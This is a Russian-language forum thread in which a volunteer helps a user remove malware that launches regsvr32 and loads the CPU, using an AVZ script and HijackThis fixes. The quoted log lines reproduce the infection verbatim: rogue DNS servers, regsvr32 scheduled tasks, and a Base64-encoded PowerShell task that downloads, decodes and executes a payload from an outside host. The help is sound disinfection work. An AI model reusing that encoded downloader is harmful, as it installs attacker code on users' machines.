|
Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » Сервер регистрации Microsoft грузит процессор. |
|
Сервер регистрации Microsoft грузит процессор.
|
Новый участник Сообщения: 5 |
Здравствуйте! В системе постоянно запускается regsvr32.exe и грузит проц.
Начал читать тему http://forum.oszone.net/thread-332245-2.html , но там написано, что инструкции пишутся индивидуально. Если это как-то поможет: то проблема, кажется, появилась после установки программы для майнинга "Kryptex", хотел попробовать, что это такое. Программу удалил, но эта фигня постоянно запускается. Пробовал сканировать 360TS а также очистил всё, что нашёл adwcleaner, но не помогло. |
|
Отправлено: 14:20, 20-02-2018 |
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Прокси сами настраивали?
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxyServer] = 173.212.202.65:80 (disabled) R1 - HKLM\System\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies: (default) = 1163.172.220.221:8888 Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('C:\PROGRA~3\10acb4e4\2df70657.dll',''); DeleteFile('C:\PROGRA~3\10acb4e4\2df70657.dll','32'); ExecuteFile('schtasks.exe', '/delete /TN "{0C0B7A47-0D0E-0D79-7F11-0E080A051179}" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "{F7021E1C-2469-EF38-13AF-A44D7DF2DE14}" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "000137E8-52F5-89BA-D86F-91C07B8ED848" /F', 0, 15000, true); ExecuteRepair(1); RebootWindows(true); BC_Activate; ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); BC_ImportALL; RebootWindows(true); end. Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма. "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): O17 - HKLM\System\CCS\Services\Tcpip\..\{159fafbb-4099-49bb-971b-d89130e30e3d}: [NameServer] = 82.163.142.178 O17 - HKLM\System\CCS\Services\Tcpip\..\{159fafbb-4099-49bb-971b-d89130e30e3d}: [NameServer] = 82.163.143.176 O17 - HKLM\System\CCS\Services\Tcpip\..\{4d1eaf74-2b79-4684-9990-a6f8aff2b061}: [NameServer] = 82.163.142.178 O17 - HKLM\System\CCS\Services\Tcpip\..\{4d1eaf74-2b79-4684-9990-a6f8aff2b061}: [NameServer] = 82.163.143.176 O17 - HKLM\System\CCS\Services\Tcpip\..\{51b9bf77-56ff-47f5-a6c2-d6a5bee784c9}: [NameServer] = 82.163.142.178 O17 - HKLM\System\CCS\Services\Tcpip\..\{51b9bf77-56ff-47f5-a6c2-d6a5bee784c9}: [NameServer] = 82.163.143.176 O17 - HKLM\System\CCS\Services\Tcpip\..\{577e598b-f2d4-4e73-9119-719546b1c774}: [NameServer] = 82.163.142.178 O17 - HKLM\System\CCS\Services\Tcpip\..\{577e598b-f2d4-4e73-9119-719546b1c774}: [NameServer] = 82.163.143.176 O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.142.178 O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.143.176 O22 - Task: 000137E8-52F5-89BA-D86F-91C07B8ED848 - C:\WINDOWS\SysWOW64\regsvr32.exe /n /s /i:"/32416c8d1fa3a497 /q" "C:\Users\User\AppData\Local\FFFD37~1\{2DF70~1." O22 - Task: {0C0B7A47-0D0E-0D79-7F11-0E080A051179} - C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwAgADsAIAAgADsAOwA7ACAAOwAgADsAOwAgACAAIAA7ADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABZAEoASQBFAFIAUgBEAFoAQwBFAF8ASwBFAEgAUABaAFkAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcAAgAC0ATgBhAG0AZQAgACQAbgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAOwB9AAoAYwBhAHQAYwBoAHsAdAByAHkAewBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQA7AH0AOwB9AFkASgBJAEUAUgBSAEQAWgBDAEUAXwBLAEUASABQAFoAWQBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAKQA7AFkASgBJAEUAUgBSAEQAWgBDAEUAXwBLAEUASABQAFoAWQBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAWQBKAEkARQBSAFIARABaAEMARQBfAEsARQBIAFAAWgBZAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAB0AGEAcwBrAGUAbgBnAC4AZQB4AGUAIgApADsACgAkAHMAdQByAGwAPQAiAGgAdAB0AHAAOgAvAC8AYgByAGkAZwBoAHQAYwBoAGkAZQBmAC4AYwBvAG0ALwB1AC8APwBhAD0ATQBiADUASQA0AEsAagBDAGEAWgBIAHAAWgBEADMAegBoAE4AWQBQAEgAeQA2AGQASwBEAEgAOABWAGcATwAzAGIASgB3AEQATgBOAGsAQQBuAHkAeQBMAE0ATgBJAGIAaQBJADEAVwBoAFMAZgB0AHoARQAtAFIAUgB3ADQATwB4AFcAZAA1AF8AbQBCAFUATwA0AGsALQBJAHEAVQB1AHoAMwA0AFEAMwBlAEEAUwBPAF8AbQBjAHYARQB2ADEAcwBNAHcAWABkAHgAcQAzADYAcwB6AHgARwBQAC0ASwB6AGYAbABOAGMAcAB3AGEAZwA2AGkAZgBRAGIANAA1AEEAUgBjAFoAWQBNAE0ARQBuAFkAdQBfAGYAQQBSAHMAdABHAFMAOQBHAE0ASwBhAHgAVwBWAGQATgBCAHMAQwBfAC0AbQBiAFgAegBTADAANwBKADIAeABjAGcANgBHAHEAcwBPAEEAawBGADMAawBZAHMAcABYAEwAYQBaAHAAcwBfAHMAUgB3AFMAegBKAEYAeABzADgAZABMAEwAMABsAGMATQBFAHIAQgB5AHcAXwBkAC0AYQBNAEgAOQBtADcAVgBRAG8AeQA5AEEAZQAtAG0AeAA0AHMAYwBjAGUAawA1AGwAOQBHAHkANQA4ADMAXwBkAGwAOAA2AFkAXwBNAEkAdgAxAE0AbwBJAHkAUgB6AFEASABtAGcAZgBlAHYAVQBkADYATABQAHoASgBEAHUANABSAFcAZwBVAFoAOQBYAHgAdwBsAGEASgBGADEARQBVAEEAegBDAFQATwBFAE8ANAA0AFkAagBtAGwATABEADEATgBCAEYAVwB0ADcAWgBZAHAAYgA1AGkAeQByADYAeQBIAHAAQwBZAGEAeQB2AEsAVQBBAHIATgBIAHkAVABFAE4AYwAyAEgATwB2ADkAaABZAGEATgB0AE8ASABxAGwAUABYAFEAYgBhADUAdwBtAEMAcQBaAFUATQAwAHIAaABrAHAAYQB6AEkARABLAEMAcABQADgAMwA3AFoAawA2AFIASABnAEgAMQBBAEUAUwA4AFMAbwB5AEYAYgBuAFkAcQBVADMAUgBnAGYAbQB3AEUAXwB2AHkAcQBEAGwAYwB2AGgANgBjAG0AQQB0AHkAMgBnADEALQB0AEkATAB3AEwAYgBXAFgATABFAE8AMABCADIAdABPADUAZABUAGIAUQByAGQANABsAG8AbwBJAHMAMQBCAEMATgBYAHQAOQBqAHAAZQByAEwAOABWAGYAdwBIAHQARwBxAFMANAByAHMAdABXAHYAVQA5AFYAQwB1AHgANQBYAGgAcQBjADAAUQAzAEkANABkAG0ATQBZAHUAeABXAE0AQQAxADkAbgBCADgANABxAEsAZQA1AGgARABtAFYAVAB1AFgAQwAzAHIAUwBpAGQAQgBGADIAUgBvAGsAbAA2AE8AdABSAFIAMgBYAGUAXwBkAGgAeABHAHAAYgA2AGEAMQBfAEMAZgBkAE8AbwBJAFEASwB2AG8AdgA4AHIAZQBpAGsAbQBhAE8AVgBLAEoAcgBTAG8AUQAyAHgAbQBzAHAAXwB4AHkAYgBSAG0AeABBAEsATwBuAGEAMABYAHUAZwBRAHcAbABaAEcAOABPAFcAUgBhAFcAYgB0AHgAVQBaAEUAOABLAEcAYQBJAFEAdgBjADQAYgAxADIAaQBzAC0AZAA1ADcAeABXAGQAdQBzAGsAZQBkAGIAbwBiAHYAdQBzAG8AVQB5AFQAQQBKAHEAYgBCADAAVgA4AFoAUABVAGkAQgBEAFEAdgBGAHQAZQBhAHUAbQA3AE8AQgA5AGIATABrAGkAdQBRAC0AaABIAEkAbgBNAG8AMgBTAFMARABMAGYAOABxADMAYwBPAG8AVAB1AFgAQwBqAHQAbABXAEYAdgBRAHcAYgBsADAAcQB5ADIAVQBWAG0AYQBHAFoAYgBaAFUAVABGAHQAeABuAHIAVgBTAG0AcQAwAG8ASQBiAEkAVgBWAHYAMQBBAE8AdgBGAHEAcgBnADcAWAB0AGwAegBKAHIASQBYAFcAUQBHAGIAaQA0AEEAUQBDAFEAeABxAHAAcgByAGgAYQBBAFkAZQBYAGsAYQBFAEQAQwBiADIAdwAtAFcAVgBuAE0ASwBLAHgARgBvAEMAeAA0ADgAOQBRADQATQAwAG0ARQAwAFkAZwBOAGEAegBZAHQAOAAwAHMAQwA1AHoANABlAHMAXwB3ADIANAB6AFAATAB3AEIAbQBuAFYASgBkAF8AUQA0AHkAYgA3AEEAMgBUADgARwA2AEsAOQBfAGcAdgA0AG4AeABWAG0AMQBnAEMAWABsAC0AOAB4AFYAVgBuAFMAbQB2AHgAXwA2AEMAaABGAEMANwByAE0AMQBKAFcASABZADQAUABoAGsAUABmAGcAUgBXAEYASQA4AHkANgBkAFUALQBOAGEAdQAyAGwAbQBOAHMATQA5AEIAbQBWADMAVABrADYAUwBhAFoARwBKAFcAVgB1AGMAMABHAHAAbgBNAEcARAA5ADYAcgBzAGEAcAAtAFAAJgBjAD0ARwBkAHQAbABvAGoAQQByAHgAbwB6ADAATwBQAEMAWABwAFkAeAB2ADIAZABMAHcATgB5AG4ARQBZAHQASABCAHkAMgBmAGsAMQAzAG8AMQAzAFUAZwBfADAARQBXAFIATwBNAEwAdQBKAEcAeQBaAGsANABYAFcAOQA1ADcAdwBjAFoAQQA1AC0ASwBpAE0ASgBMAFMAdgAxAFQAdABUAEMALQAtAFMARgByADQAYwB2ADAAQQBfAGsAcwAwAHYAaABPAFEAeQBGAGUAWAB5AGgATwAzAGUANgByAEkAdwB6AFIATQBjAFgAcAB3ADYASABtAGkAbAB5AHAAegBFAFoAeQBsAHgAbABfADUATQA3ADYAcwBxAE0AUQBIAGsAZgBDAHgAawBvAC0AQgBqADQATQBoAEgATQBTAFoAMwA5AHEAZABnADEAawBXAGoATQBPAFQAUwBpADMAawBBADUANgBDAEwANQBpAF8AbAA2ADUAQQBtAHoAMwA5AHkAVgBlAFUAagAyAGoAQgBrAGwAOQBFADAAQgBHAF8AUABlAHIATgBNAF8AWQBoAHMAMQBoAEgAbQBoAFcAXwBFAG0AQgA2AHkAOABtAG0ARABDAHYAYwBLAHkAWgBhAEoAUwBjAEwAWgBfAGYANgB0AFkATwBnAFAATgA4ADAAdQBjAFEAdAB1AGkAUABnAHgARABzAG4AMQBNAHgAMQAyAGoAMwBsAFYAZwAxAGkAbABVAHcAdQBuADQAcABjAGQAaQBjAGIAdABpADEAUQBoAGYAeQBuADEAOABHAHIASQAyAEgAdgB4AFMAbQBYAEIANgAxADYAYgBVAEsAQwBBAHcAdABUAGgAeQByADkAXwAyAGcASgBRAEIANwBsADIATwBFADEARgBNAHIAUgAtAHcAZgBjAHkAOAByAFoAcwA5AE0AegByAGoAQQBPAFAAVQByAEQAagA4AEEARAAzAFQAOABLAEMAdgBqAGcAagBjADEAdwBNAGIAWgBWAE8AeQAwAGwAUAB2AHUAVwBPAGoAMgB4AF8ATAB3AEsAVgAzAHAAQQBiAEgAMwBpAHgAYgBaAEgAegBkAGIAYgB4AEIARQBiADQAcQBWADUAYwBwAEcAcQBDAE4AbgBmAFcAdwBOADAARwBCADgAQwBRAHUAUAByAG8AcgBjAGcAYgBqADAAMABsAFUAMQB1ADAAQwBVAG4AdgBvAEwATABiAEEARgBBAG0ANgBkAGgAYgBaAFcAZABNAEYASgA1AGkAUgBtADEAZgBKAHkAZgBuADAAVQBSAEgAcwBpAFIASgBqADkARQB0ADUAVABZAC0AcQBxAEUANgA0AHQAWQBDAGcAcgA1AGoAQwBDAHIAdwBGAFMANABYAGkAMwAwADMAWQByAGEAeQBkAGEAUwBrADcAWQBNAFMAOABjAHQAMQBBAGgAYwBlAFAATABjAGQAdwAwAFUAdQBiAFEAZgAwAFgAZQBGAGIAZgBMAHUASwBlAEEAMQBkAFoAZQBqADAAbABvADMAUgBXAEoAaQBPADQAUAA1AFoAZwBYAGsAbwBhAGYAcgB3ADgANABRAHQAMQBpAG4AWQBCAEIAbABvADQAQgBvAEsAdwBEAEIAbAA4AGQANgBvAG8AMwBkAFIAaABjADcAQwA4AF8ANwBpAHcAbwBZAEcAbgBWAF8ARwBMAC0ASwBsAHEAMwBaADYARQBxADMAUABMADIAMQBaAHYAVgAxADkAUwB2AEEARwAwAFMAWgBYAFMAdQBOAFgAaABPAEIAbgB1ADMAaQBrAHEANwBrAEEAbQByADUAYgBvAGMAOABsAFAAdQBLAGsAQgA1AE4AcwBrAHkAMgBsAEMAMwBkAHMAcwB0AE4AWABsAG0AVwB2AGgAaABOAEsAVABiAGYAcQBtAHQARwBrAEEASgA0ADIANwBBAE4ATwBzAE0AUwB5AGUAUABpAHUAQwB0ADYARwBBAHQAeAA1ADAAMwBSAGUAQwA5ADkAMgByAFQAVgBvADYAQQAtAEwARAAtADQAWABXAFAAUQA4AFcASQBJAHMANwBHAHoARABLAHQAWQB2AHgAOABVAFAAQgBIAEYATABNAHAANQBVAHQAaQBHAG8ANgBaADMANQBhAGYAcgA0AEEAWABLAHQATgBrAGMAWABnADMAbQA0ADQATQBTAGcAJgByAD0AMgAxADIAMQA5ADIAOAA3ADAANQA4ADQAOQA0ADQANgA4ADYAMAAiADsAJABzAHQAcwBrAD0AIgB7ADAAQwAwAEIANwBBADQANwAtADAARAAwAEUALQAwAEQANwA5AC0ANwBGADEAMQAtADAARQAwADgAMABBADAANQAxADEANwA5AH0AIgA7ACQAcAByAGkAZAA9ACIAZgBsAG8AYQB0AGkAbgBnACIAOwAkAGkAbgBpAGQAPQAiAFIAVABXAFAAVwBQAFUATgAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwAgAH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAWgBUAEYARgBTAFUAVwBUAFQATABCACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAFIATwBQAEMAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA7AH0ACgAkAHMAYwA9AEEAUgBPAFAAQwAoAFoAVABGAEYAUwBVAFcAVABUAEwAQgAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA== O22 - Task: {F7021E1C-2469-EF38-13AF-A44D7DF2DE14} - C:\WINDOWS\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\10acb4e4\2df70657.dll" Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Отметьте галочкой также "Shortcut.txt". Нажмите кнопку Scan. После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Подробнее читайте в этом руководстве. |
Отправлено: 16:15, 20-02-2018 | #2 |
Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети. Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля. |
Новый участник Сообщения: 5
|
Профиль | Отправить PM | Цитировать Прокси сам настраивал.
quarantine.zip создаётся пустым и весит 1кб. Есть смысл отправлять его по форме? Отчёты отправляю |
Отправлено: 18:02, 20-02-2018 | #3 |
Новый участник Сообщения: 5
|
Профиль | Отправить PM | Цитировать Забыл упомянуть - пофиксил в HijackThis . После перезагрузки уже в течение трёх часов не наблюдаю данной проблемы.
|
Отправлено: 19:06, 20-02-2018 | #4 |
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Цитата tomclar:
Сами политики настраивали? HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1 HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKLM\...\Policies\Explorer: [NoResolveSearch] 1
Подробнее читайте в этом руководстве. |
||
Отправлено: 19:41, 20-02-2018 | #5 |
Новый участник Сообщения: 5
|
Профиль | Отправить PM | Цитировать Не помню чтобы сам политики настраивал)
|
Отправлено: 21:51, 20-02-2018 | #6 |
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Цитата tomclar:
Подробнее читайте в этом руководстве. Цитата tomclar:
Подготовьте лог лог SecurityCheck by glax24 Ознакомьтесь: Рекомендации после лечения Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
|
||
Отправлено: 22:21, 20-02-2018 | #7 |
Новый участник Сообщения: 5
|
Профиль | Отправить PM | Цитировать Финальные логи. Кажется, проблема решена. Спасибо огромное! Так это был майнинг криптовалюты или амиго какой-нибудь?
|
Отправлено: 00:26, 21-02-2018 | #8 |
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Исправляем по возможности
------------------------------- [ Windows ] ------------------------------- Internet Explorer 11.125.16299.0 Внимание! Скачать обновления ^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^ Запрос на повышение прав для администраторов отключен ^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^ --------------------------- [ FirewallWindows ] --------------------------- (просто включите защиту 360 Total Security) Отключен доменный профиль Брандмауэра Windows Отключен общий профиль Брандмауэра Windows Отключен частный профиль Брандмауэра Windows -------------------------- [ OtherUtilities ] ---------------------------- 7-Zip 16.04 (x64) v.16.04 Внимание! Скачать обновления ^Удалите старую версию, скачайте и установите новую.^ WinRAR 5.31 (32-разрядная) v.5.31.0 Внимание! Скачать обновления Ghostscript GPL 8.64 (Msi Setup) v.8.64 Внимание! Скачать обновления -------------------------------- [ Java ] --------------------------------- Java 8 Update 161 v.8.0.1610.12 Внимание! Скачать обновления ^Удалите старую версию и установите новую (jre-8u162-windows-i586.exe)^ ------------------------------- [ Browser ] ------------------------------- Mozilla Firefox 54.0.1 (x86 ru) v.54.0.1 Внимание! Скачать обновления ---------------------------- [ UnwantedApps ] ----------------------------- Ace Stream Media 3.1.16.1 v.3.1.16.1 Внимание! Нежелательное ПО. Описание программы. |
Отправлено: 11:25, 21-02-2018 | #9 |
![]() |
Участник сейчас на форуме |
![]() |
Участник вне форума |
![]() |
Автор темы |
![]() |
Сообщение прикреплено |
| |||||
Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
Разное - TrustedInstaler грузит процессор | DimonNT | Microsoft Windows 7 | 3 | 09-05-2015 08:03 | |
Службы - Stisvc грузит процессор | DimonNT | Microsoft Windows 7 | 0 | 11-12-2013 19:50 | |
Сервер регистрации запускает UAC при входе в ОС | lunar | Хочу все знать | 2 | 29-11-2013 17:36 | |
Службы - Прекращена работа программы "Сервер регистрации Microsoft" | kontaktid | Microsoft Windows 7 | 12 | 20-06-2011 20:44 | |
Microsoft объявляет о начале регистрации на PDC10 | OSZone News | Новости и события Microsoft | 0 | 16-07-2010 15:30 |
|